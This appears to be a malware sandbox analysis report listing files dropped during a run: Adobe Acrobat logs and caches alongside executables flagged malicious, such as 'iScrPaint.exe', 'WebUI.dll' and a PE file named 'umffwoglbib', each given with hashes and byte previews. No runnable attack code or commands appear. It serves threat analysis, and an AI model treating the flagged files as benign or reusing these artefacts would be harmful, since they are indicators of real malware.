                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\acrobat_sbx\NGL\NGLClient_AcrobatReader123.6.20320.6 2024-12-21 08-59-13-073.log

                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (393)
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):16525
                                                                                                                                                                                                                                              Entropy (8bit):5.376360055978702
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:384:6b1sdmfenwop+WP21h2RPjRNg7JjO2on6oU6CyuJw1oaNIIu9EMuJuF6MKK9g9JQ:vIn
                                                                                                                                                                                                                                              MD5:1336667A75083BF81E2632FABAA88B67
                                                                                                                                                                                                                                              SHA1:46E40800B27D95DAED0DBB830E0D0BA85C031D40
                                                                                                                                                                                                                                              SHA-256:F81B7C83E0B979F04D3763B4F88CD05BC8FBB2F441EBFAB75826793B869F75D1
                                                                                                                                                                                                                                              SHA-512:D039D8650CF7B149799D42C7415CBF94D4A0A4BF389B615EF7D1B427BC51727D3441AA37D8C178E7E7E89D69C95666EB14C31B56CDFBD3937E4581A31A69081A
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Preview:SessionID=03c9683a-b9c7-43c5-80d5-ee4bbf74fb26.1696428955961 Timestamp=2023-10-04T16:15:55:961+0200 ThreadID=6596 Component=ngl-lib_NglAppLib Description="-------- Initializing session logs --------".SessionID=03c9683a-b9c7-43c5-80d5-ee4bbf74fb26.1696428955961 Timestamp=2023-10-04T16:15:55:962+0200 ThreadID=6596 Component=ngl-lib_kOperatingConfig Description="GetRuntimeDetails: No operating configs found".SessionID=03c9683a-b9c7-43c5-80d5-ee4bbf74fb26.1696428955961 Timestamp=2023-10-04T16:15:55:962+0200 ThreadID=6596 Component=ngl-lib_kOperatingConfig Description="GetRuntimeDetails: Fallback to NAMED_USER_ONLINE!!".SessionID=03c9683a-b9c7-43c5-80d5-ee4bbf74fb26.1696428955961 Timestamp=2023-10-04T16:15:55:962+0200 ThreadID=6596 Component=ngl-lib_NglAppLib Description="SetConfig: OS Name=WINDOWS_64, OS Version=10.0.19045.1".SessionID=03c9683a-b9c7-43c5-80d5-ee4bbf74fb26.1696428955961 Timestamp=2023-10-04T16:15:55:962+0200 ThreadID=6596 Component=ngl-lib_NglAppLib Description="SetConfig:

                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\acrobat_sbx\NGL\NGLClient_AcrobatReader123.6.20320.6.log

                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (393), with CRLF line terminators
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):15114
                                                                                                                                                                                                                                              Entropy (8bit):5.375575459095472
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:384:N39fhfMfZflfQ0aQ0E030M/0q0P0J0K0s0lwqwURCRkKdKVKCKZbKuOTOvOZl7ld:DtU
                                                                                                                                                                                                                                              MD5:08BADD2643A1FA7664B34C684DB48985
                                                                                                                                                                                                                                              SHA1:E645324CEE1700FA0E06A786AE847FDDE36E050B
                                                                                                                                                                                                                                              SHA-256:9642515F0ED72B22CA2A92636DAB88BAF32B1577F1C6B27D87822E96B112B2D6
                                                                                                                                                                                                                                              SHA-512:E47FA00C9386A4ED8157116511D580B74A00774758F9F35542435AAEFCB38916D3F41D56668E82BF7BC09BE339E5DE0FA3E9A570EA7F6BEE80FF3F36C7C045B1
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Preview:SessionID=badec9bf-b009-40b8-bffb-6e96672e8a76.1734789553112 Timestamp=2024-12-21T08:59:13:112-0500 ThreadID=7912 Component=ngl-lib_NglAppLib Description="-------- Initializing session logs --------"..SessionID=badec9bf-b009-40b8-bffb-6e96672e8a76.1734789553112 Timestamp=2024-12-21T08:59:13:123-0500 ThreadID=7912 Component=ngl-lib_kOperatingConfig Description="GetRuntimeDetails: No operating configs found"..SessionID=badec9bf-b009-40b8-bffb-6e96672e8a76.1734789553112 Timestamp=2024-12-21T08:59:13:123-0500 ThreadID=7912 Component=ngl-lib_kOperatingConfig Description="GetRuntimeDetails: Fallback to NAMED_USER_ONLINE!!"..SessionID=badec9bf-b009-40b8-bffb-6e96672e8a76.1734789553112 Timestamp=2024-12-21T08:59:13:123-0500 ThreadID=7912 Component=ngl-lib_NglAppLib Description="SetConfig: OS Name=WINDOWS_64, OS Version=10.0.19045.1"..SessionID=badec9bf-b009-40b8-bffb-6e96672e8a76.1734789553112 Timestamp=2024-12-21T08:59:13:123-0500 ThreadID=7912 Component=ngl-lib_NglAppLib Description="SetConf

                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\acrobat_sbx\acroNGLLog.txt

                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):29752
                                                                                                                                                                                                                                              Entropy (8bit):5.400870070742421
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:768:GLxxlyVUFcAzWL8VWL1ANSFld5YjMWLvJ8Uy++NSXl3WLd5WLrbhhVClkVMwDGbt:5
                                                                                                                                                                                                                                              MD5:0057C45FD61F945E5FBE3AB035AB28C3
                                                                                                                                                                                                                                              SHA1:2B63E6195B89CF3BB3A0B2C5E3DFF0BFC09B5492
                                                                                                                                                                                                                                              SHA-256:D055C773C5FA3A3E887848847BDD31B7C2E49C5C80A5FD7B195671BAD3C90D8C
                                                                                                                                                                                                                                              SHA-512:F7D804E03FBE592072F85C3A01A34032D52FDD23038D21B6465E3440E8B4BBADDB9C81650EEB8E2E4326C7318149ABAF0434893B8A125939437EA629E76D6024
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Preview:04-10-2023 02:39:31:.---2---..04-10-2023 02:39:31:.AcroNGL Integ ADC-4240758 : ***************************************..04-10-2023 02:39:31:.AcroNGL Integ ADC-4240758 : ***************************************..04-10-2023 02:39:31:.AcroNGL Integ ADC-4240758 : ******** Starting new session ********..04-10-2023 02:39:31:.AcroNGL Integ ADC-4240758 : Starting NGL..04-10-2023 02:39:31:.AcroNGL Integ ADC-4240758 : Setting synchronous launch...04-10-2023 02:39:31:.AcroNGL Integ ADC-4240758 ::::: Configuring as AcrobatReader1..04-10-2023 02:39:31:.AcroNGL Integ ADC-4240758 : NGLAppVersion 23.6.20320.6..04-10-2023 02:39:31:.AcroNGL Integ ADC-4240758 : NGLAppMode NGL_INIT..04-10-2023 02:39:31:.AcroNGL Integ ADC-4240758 : AcroCEFPath, NGLCEFWorkflowModulePath - C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1 C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow..04-10-2023 02:39:31:.AcroNGL Integ ADC-4240758 : isNGLExternalBrowserDisabled - No..04-10-2023 02:39:31:.Closing File..04-10-

                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\acrocef_low\057e6a67-0d29-40ab-ae8e-50a6fd391371.tmp

                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                                                                                                                                                                              File Type:gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 299538
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):758601
                                                                                                                                                                                                                                              Entropy (8bit):7.98639316555857
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:12288:ONh3P65+Tegs6121YSWBlkipdjuv1ybxrr/IxkB1mabFhOXZ/fEa+vTJJJJv+9U0:O3Pjegf121YS8lkipdjMMNB1DofjgJJg
                                                                                                                                                                                                                                              MD5:3A49135134665364308390AC398006F1
                                                                                                                                                                                                                                              SHA1:28EF4CE5690BF8A9E048AF7D30688120DAC6F126
                                                                                                                                                                                                                                              SHA-256:D1858851B2DC86BA23C0710FE8526292F0F69E100CEBFA7F260890BD41F5F42B
                                                                                                                                                                                                                                              SHA-512:BE2C3C39CA57425B28DC36E669DA33B5FF6C7184509756B62832B5E2BFBCE46C9E62EAA88274187F7EE45474DCA98CD8084257EA2EBE6AB36932E28B857743E5
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Preview:...........kWT..0...W`.........b..@..nn........5.._..I.R3I..9g.x....s.\+.J......F...P......V]u......t....jK...C.fD..]..K....;......y._.U..}......S.........7...Q.............W.D..S.....y......%..=.....e..^.RG......L..].T.9.y.zqm.Q]..y..(......Q]..~~..}..q...@.T..xI.B.L.a.6...{..W..}.mK?u...5.#.{...n...........z....m^.6!.`.....u...eFa........N....o..hA-..s.N..B.q..{..z.{=..va4_`5Z........3.uG.n...+...t...z.M."2..x.-...DF..VtK.....o]b.Fp.>........c....,..t..an[............5.1.(}..q.q......K3.....[>..;e..f.Y.........mV.cL...]eF..7.e.<.._.o\.S..Z...`..}......>@......|.......ox.........h.......o....-Yj=.s.g.Cc\.i..\..A.B>.X..8`...P......[..O...-.g...r..u\...k..7..#E....N}...8.....(..0....w....j.......>.L....H.....y.x3...[>..t......0..z.qw..]X..i8..w.b..?0.wp..XH.A.[.....S..g.g..I.A.15.0?._n.Q.]..r8.....l..18...(.].m...!|G.1...... .3.`./....`~......G.............|..pS.e.C....:o.u_..oi.:..|....joi...eM.m.K...2%...Z..j...VUh..9.}.....

                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\acrocef_low\2cf37615-58f9-441c-9d07-bc5aa2585abd.tmp

                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                                                                                                                                                                              File Type:gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 5111142
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):1419751
                                                                                                                                                                                                                                              Entropy (8bit):7.976496077007677
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:24576:/RwYIGNP4meWL07oXGZ1dpy6mlind9j2kvhsfFXpAXDgrFBU2/R07D:ZwZG6XWLxXGZN3mlind9i4ufFXpAXkru
                                                                                                                                                                                                                                              MD5:3E2D879F2C17CB927D259AABADA22E63
                                                                                                                                                                                                                                              SHA1:244E867380AF3F02DA05F1545B9EB4C5AF4344F1
                                                                                                                                                                                                                                              SHA-256:859600ADE2AC3561FB00A165DD68DCFA12819776AC96A43BE9C6A775782B042A
                                                                                                                                                                                                                                              SHA-512:BBC0B0603988A51E3A0B03FEF585EA3C79C4F0ADD0EAE8A96C010F085FF1BBDD28F677EFC56CA638B282602C4A60190E0C8BAD93017923B1E7F549F48294C0F1
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Preview:...........[.s.8..}.....!#..gw.n.`uNl.f6.3....d%EK.D["...#.......!)...r.$.G.......Z..u.._>.~....^e..<..u..........._D.r.Z..M.:...$.I..N.....\`.B.wj...:...E|.P..$ni.{.....T.^~<m-..J....RQk..*..f.....q.......V.rC.M.b.DiL\.....wq.*...$&j....O.........~.U.+..So.]..n..#OJ..p./..-......<...5..WB.O....i....<./T.P.L.;.....h.ik..D*T...<...j..o..fz~..~."...w&.fB...4..@[.g.......Y.>/M.".....-..N.{.2.....\....h..ER..._..(.-..o97..[.t:..>..W*..0.....u...?.%...1u..fg..`.Z.....m ~.GKG.q{.vU.nr..W.%.W..#z..l.T......1.....}.6......D.O...:....PX.......*..R.....j.WD).M..9.Fw...W.-a..z.l\..u*.^....*L..^.`.T...l.^.B.DMc.d....i...o.|M.uF|.nQ.L.E,.b!..NG.....<...J......g.o....;&5..'a.M...l..1.V.iB2.T._I....".+.W.yA ._.......<.O......O$."C....n!H.L`..q.....5..~./.._t.......A....S..3........Q[..+..e..P;...O...x~<B........'.)...n.$e.m.:...m.....&..Y.".H.s....5.9..A5)....s&.k0,.g4.V.K.,*.e....5...X.}6.P....y\.s|..Si..BB..y...~.....D^g...*7'T-.5*.!K.$\...2.

                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\acrocef_low\86cb94f3-9e85-478f-894d-19367a6f2901.tmp

                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                                                                                                                                                                              File Type:gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 33081
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):1407294
                                                                                                                                                                                                                                              Entropy (8bit):7.97605879016224
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:24576:/xA7o5dpy6mlind9j2kvhsfFXpAXDgrFBU2/R07/WLrGZkwYIGNPJe:JVB3mlind9i4ufFXpAXkrfUs0jWLrGZx
                                                                                                                                                                                                                                              MD5:0DEB641F638584E0D369B736918ADE0D
                                                                                                                                                                                                                                              SHA1:F28C3A8DF2F27ED0505D17C146DD4E3B3D02585F
                                                                                                                                                                                                                                              SHA-256:3FCEA64B11AADB53C8AF1073FEBAAEDB9CD9489CF209A4C091F7C16BD62302BE
                                                                                                                                                                                                                                              SHA-512:1E504F602EC378DE6A4B0A63B786B7FBA42FFB3FC05151EC01747AAFA234478943C0D38C1622DB985FBE82ADC5472CB7477344C9A7606AB4CE4F6F38C29A623F
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Preview:...........[.s.8..}.....!#..gw.n.`uNl.f6.3....d%EK.D["...#.......!)...r.$.G.......Z..u.._>.~....^e..<..u..........._D.r.Z..M.:...$.I..N.....\`.B.wj...:...E|.P..$ni.{.....T.^~<m-..J....RQk..*..f.....q.......V.rC.M.b.DiL\.....wq.*...$&j....O.........~.U.+..So.]..n..#OJ..p./..-......<...5..WB.O....i....<./T.P.L.;.....h.ik..D*T...<...j..o..fz~..~."...w&.fB...4..@[.g.......Y.>/M.".....-..N.{.2.....\....h..ER..._..(.-..o97..[.t:..>..W*..0.....u...?.%...1u..fg..`.Z.....m ~.GKG.q{.vU.nr..W.%.W..#z..l.T......1.....}.6......D.O...:....PX.......*..R.....j.WD).M..9.Fw...W.-a..z.l\..u*.^....*L..^.`.T...l.^.B.DMc.d....i...o.|M.uF|.nQ.L.E,.b!..NG.....<...J......g.o....;&5..'a.M...l..1.V.iB2.T._I....".+.W.yA ._.......<.O......O$."C....n!H.L`..q.....5..~./.._t.......A....S..3........Q[..+..e..P;...O...x~<B........'.)...n.$e.m.:...m.....&..Y.".H.s....5.9..A5)....s&.k0,.g4.V.K.,*.e....5...X.}6.P....y\.s|..Si..BB..y...~.....D^g...*7'T-.5*.!K.$\...2.

                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\acrocef_low\b37366ba-7133-4dca-8483-99a3c2b177f5.tmp

                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                                                                                                                                                                              File Type:gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 1311022
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):386528
                                                                                                                                                                                                                                              Entropy (8bit):7.9736851559892425
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:6144:8OSTJJJJEQ6T9UkRm1lBgI81ReWQ53+sQ36X/FLYVbxrr/IxktOQZ1mau4yBwsOo:sTJJJJv+9UZX+Tegs661ybxrr/IxkB1m
                                                                                                                                                                                                                                              MD5:5C48B0AD2FEF800949466AE872E1F1E2
                                                                                                                                                                                                                                              SHA1:337D617AE142815EDDACB48484628C1F16692A2F
                                                                                                                                                                                                                                              SHA-256:F40E3C96D4ED2F7A299027B37B2C0C03EAEEE22CF79C6B300E5F23ACB1EB31FE
                                                                                                                                                                                                                                              SHA-512:44210CE41F6365298BFBB14F6D850E59841FF555EBA00B51C6B024A12F458E91E43FDA3FA1A10AAC857D4BA7CA6992CCD891C02678DCA33FA1F409DE08859324
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Preview:...........]s[G. Z...{....;...J$%K&..%.[..k...S....$,.`. )Z..m........a.......o..7.VfV...S..HY}Ba.<.NUVVV~W.].;qG4..b,N..#1.=1.#1..o.Fb.........IC.....Z...g_~.OO.l..g.uO...bY.,[..o.s.D<..W....w....?$4..+..%.[.?..h.w<.T.9.vM.!..h0......}..H..$[...lq,....>..K.)=..s.{.g.O...S9".....Q...#...+..)>=.....|6......<4W.'.U.j$....+..=9...l.....S..<.\.k.'....{.1<.?..<..uk.v;.7n.!...g....."P..4.U........c.KC..w._G..u..g./.g....{'^.-|..h#.g.\.PO.|...]x..Kf4..s..............+.Y.....@.K....zI..X......6e?[..u.g"{..h.vKbM<.?i6{%.q)i...v..<P8P3.......CW.fwd...{:@h...;........5..@.C.j.....a.. U.5...].$.L..wW....z...v.......".M.?c.......o..}.a.9..A..%V..o.d....'..|m.WC.....|.....e.[W.p.8...rm....^..x'......5!...|......z..#......X_..Gl..c..R..`...*.s-1f..]x......f...g...k........g....... ).3.B..{"4...!r....v+As...Zn.]K{.8[..M.r.Y..........+%...]...J}f]~}_..K....;.Z.[..V.&..g...>...{F..{I..@~.^.|P..G.R>....U..../HY...(.z.<.~.9OW.Sxo.Y

                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\ebf01ed0

                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                              Process:C:\Users\user\AppData\Roaming\BackupPatch\iScrPaint.exe
                                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):1037483
                                                                                                                                                                                                                                              Entropy (8bit):7.557412715223082
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:24576:feLXBhXa50sZ2oAUn9lz/uAdJD3vpZu05n42gAE:GLTmvyUPvp320O2gAE
                                                                                                                                                                                                                                              MD5:D5D6AF4BB6B117FB72758293C9F0EADF
                                                                                                                                                                                                                                              SHA1:32BFAAB014C8DA22E875C7FC656BA713542C3198
                                                                                                                                                                                                                                              SHA-256:928C455928F5E07080CD5C6FFDE51B895412EFB1E7BE9A963932EE0FC2675B8C
                                                                                                                                                                                                                                              SHA-512:D654A9219055F7D9CB36FEAC071C318206121DA41F6E152EA8E5651C1EE9A70D06C91C87677DEEFA035ADDB6E05C9FF5942FAB70B5F7F638783AA3A84FA78CE7
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Preview:.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................US.UW..HN.fl..rw.}m..cp.`b..4N.a_.{d..yp.`b..as..............................................{J.`j.}y.l.......................................................................................{@..uw.zp..z`......................................................................................CJ.]Q..Yj.{p.`-.@_.un.{q......................................................................&-..!3..#..........................................

                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\umffwoglbib

                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                              Process:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):306176
                                                                                                                                                                                                                                              Entropy (8bit):6.865476116199445
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:6144:gkK6W/39Y4zbD5ozoOxMEpgSVumtLoYgXCuVy1w5XT7LUI:3Wf9Y4zbNUcQbBgXhVy1w5X3Lx
                                                                                                                                                                                                                                              MD5:63EDA0295FD63BAE2EB8FEA1B24265C0
                                                                                                                                                                                                                                              SHA1:7253EA84A03377D093F5F4B11813325074853214
                                                                                                                                                                                                                                              SHA-256:2C27FD45F2221517C2BE02BFD8D57A2DF2781B97908D26B9F08C26ACD0E6D927
                                                                                                                                                                                                                                              SHA-512:57A3DDB3EB15102D20D33805DD58E02DB8BD683516C5BCA6F8D4D916066EF43998ABEC1966FA5D3B3E5A74E680ED47CF72DEA8C3228F6194C5620CF481C29504
                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                              Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L......b............................P.............@..........................p............@.................................................................. ...8...................................................................................text...6........................... ..`.rdata... ......."..................@..@.data........0...P..................@....reloc...8... ...:...b..............@..Bkygc.........`......................@...................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                              C:\Users\user\AppData\Roaming\BackupPatch\WebUI.dll

                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                              Process:C:\Users\user\iScrPaint.exe
                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):7994880
                                                                                                                                                                                                                                              Entropy (8bit):6.703465342581849
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:196608:639LxBBmYeZ12U8Blc/OwDlcXus9n0SJsv6tWKFdu9CZ:OLx6YeZ12TBlc/OwDlitJsv6tWKFdu9C
                                                                                                                                                                                                                                              MD5:42D6C8DC4853BC75E165840F2E3AF062
                                                                                                                                                                                                                                              SHA1:0CAE81999BEB48D72D54BD6C2AA4BD1195F7A8A6
                                                                                                                                                                                                                                              SHA-256:87850B43C89E0D8C132D7BE8DED5B075DFBCF9F4AC3802F6C9169EDBB168288A
                                                                                                                                                                                                                                              SHA-512:CBA53C9F6B46D4891C7C05BEE34FF87B64CA96C8607DD3332F7D0318721BFF90D5E14152BC29040E8F27DABA5516A8B23E880BFF911821A060609B9C6F9B3FA3
                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 8%
                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$............uF.uF.uFs..F.uF...F..uF.c.F.uF.c.F.uF.tF..uF...F..uF...F.uF...F.uF...F.uF...F.uF...F.uFRich.uF........................PE..L...A..R...........!.....^U..@%.......J......pU...............................z......nz...@..........................vq......Tq.......t.......................t..E...wU..............................gn.@............pU.D............................text...`]U......^U................. ..`.rdata..+....pU......bU.............@..@.data...H.....q..z...lq.............@....unwanted.....t.......s.............@..@.rsrc.........t.......s.............@..@.reloc........t.......s.............@..B........................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                              C:\Users\user\AppData\Roaming\BackupPatch\fnwp

                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                              Process:C:\Users\user\iScrPaint.exe
                                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):794013
                                                                                                                                                                                                                                              Entropy (8bit):7.9061967126983355
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:12288:T6xK8IlPnUWetr9nIaD21C6L7Rb3xhqRVyjHIU0QEWJJeZmZeUc:mM8kcWONKnL7bhqRVyzIU0RYs8ZU
                                                                                                                                                                                                                                              MD5:6D9B330A77FFB52761857313E2797282
                                                                                                                                                                                                                                              SHA1:9A4738CF2B26C3596A11CF5170BD0816A56D5626
                                                                                                                                                                                                                                              SHA-256:08E62528AB5EB1CBDF31F2F46EEF3547E37F5B5164D1B9B92B3D40668472975E
                                                                                                                                                                                                                                              SHA-512:156C84807CEC72EEE292791B4BF8264D0D0571B13EC2F3B359561F27E99513015563E0761A9E36D8DB52B8A22021434BC90D630450C424963A439D7777A56B60
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Preview:t.pY...EkoJ..bkg..N.v...]tP..PI..\sN.LOe.Jegth.u.GD][EB..V.Rj...`.P...k....ksJBfdYdf_....fQ......U....g..u.lDaC.O..R.G.QFE_.J.L.h..r.qw.e.`G..X..Rj.CZc...Ll....E..d[..M.......i..._..eH.F..w.Gi.WN.JPp.B.GVP.....XU.Jna..IPb.....\s.lyx.v.....rHG.W.]...GKry...rf...g.^LJK...w....XyX.k...v.aaw._..Gw...EL........YYrTD.JNRb.qvm...s..y..f..H.....DtO.e...K.......WK.p.L.YIMbjL....D.....\Idg...H....Z^.pj.H...ncj...f...[X..I.dx..x.EV...f..`.e.KW.....fWU`....L.w.xr...Fwx..Y.co.U..p..b.tdX.....].n...l.Q....X..XO.....uii.A..D....f.l..ddHJ.RRiP..E.WX.s..c..sX..r......D..u.U.o.\W.D.PU.njyMw.sC.JJbJ...C.C...B.....c.A.P..N..l_..kO\..Hj.....dIxjt..K..^]Nfv...Gn.e.....Q...RvHje.R].s.Ts.uQ\ep^.Bq..d.......n..oF.Nq...`.h...f.q[qnqM.pE.V.......e.S.u.].TqW.A..]m..y.G..e.VP..RU.`b.Jr..ki^.w[lI.uy...Ya..W..[y..My..FI^no.nC.....a...j.uF.X...q.Jt^.E.N.PWb.gCu.]..IEBQOSeKXB^..e...XE.f..`vlL..s.Rv......jcgvg.L..CT....S....d.B[tMWx..V...iYa.....o.w`...T..j.O.D...^..L..OtvR.W.....E.v`.P.Pv.OR.p.....D^BYL._.yE^..B.tf..q

                                                                                                                                                                                                                                              C:\Users\user\AppData\Roaming\BackupPatch\iScrPaint.exe

                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                              Process:C:\Users\user\iScrPaint.exe
                                                                                                                                                                                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):1909504
                                                                                                                                                                                                                                              Entropy (8bit):6.730805689885005
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:49152:GpjwrP6yVgBd39sUUzFti4aTotmIT3SxLmNKbx:GpjwrP6yKTOUmi4aTo1NK9
                                                                                                                                                                                                                                              MD5:098AC4621EE0E855E0710710736C2955
                                                                                                                                                                                                                                              SHA1:CE7B88657C3449D5D05591314AAA43BD3E32BDAA
                                                                                                                                                                                                                                              SHA-256:46AFBF1CBD2E1B5E108C133D4079FADDC7347231B0C48566FD967A3070745E7F
                                                                                                                                                                                                                                              SHA-512:3042785B81BD18B641F0A2B5D8AEC8EF86F9BF1269421FB96D1DB35A913E744EAFF16D9DA7A02C8001435D59BEFB9F26BC0BBFA6E794811ABF4282ED68B185FE
                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                              Yara Hits:
                                                                                                                                                                                                                                              • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: C:\Users\user\AppData\Roaming\BackupPatch\iScrPaint.exe, Author: Joe Security
                                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 3%
                                                                                                                                                                                                                                              Joe Sandbox View:
                                                                                                                                                                                                                                              • Filename: de7s.txt.ps1, Detection: malicious, Browse
                                                                                                                                                                                                                                              • Filename: ofsetvideofre.click.ps1, Detection: malicious, Browse
                                                                                                                                                                                                                                              • Filename: NPKpnpi8wd.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                              Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L...s..d..................................... ....@...........................!..................@......................P....@...F......8................;......8"...................................................L...............................text............................... ..`.itext..P........................... ..`.data........ ......................@....bss.....g...............................idata...F...@...H..................@....edata..P...........................@..@.tls....L................................rdata..............................@..@.reloc..8".......$..................@..B.rsrc...8............*..............@..@....................."..............@..@........................................................

                                                                                                                                                                                                                                              C:\Users\user\AppData\Roaming\BackupPatch\woy

                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                              Process:C:\Users\user\iScrPaint.exe
                                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):64950
                                                                                                                                                                                                                                              Entropy (8bit):4.515083558964412
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:1536:RkNN3WO3yFEA8KV587xJxRaMv7+NHE8qsK4pezGNxzOW/Ro:0ZWO3yFEA8ECRRv7uk8qsK4kzGN9OWu
                                                                                                                                                                                                                                              MD5:DB9F61246773A0BA48516A9549603B06
                                                                                                                                                                                                                                              SHA1:6CB9FF25201C920D61FF861A687DC7FA1D321C18
                                                                                                                                                                                                                                              SHA-256:6B6D7477963EA3AA4028878716A918A3028D6452F1AB1CBF92B4F073FE81F973
                                                                                                                                                                                                                                              SHA-512:79AC6DEE0EB3B3F210230481695D6E7324018A329871F0A32D02480A7CECC4F31353C32A5B14E6E686288AB2E0AA5CCFA9103C89E212DB79591F06491FF7E0AB
                                                                                                                                                                                                                                              Malicious:false
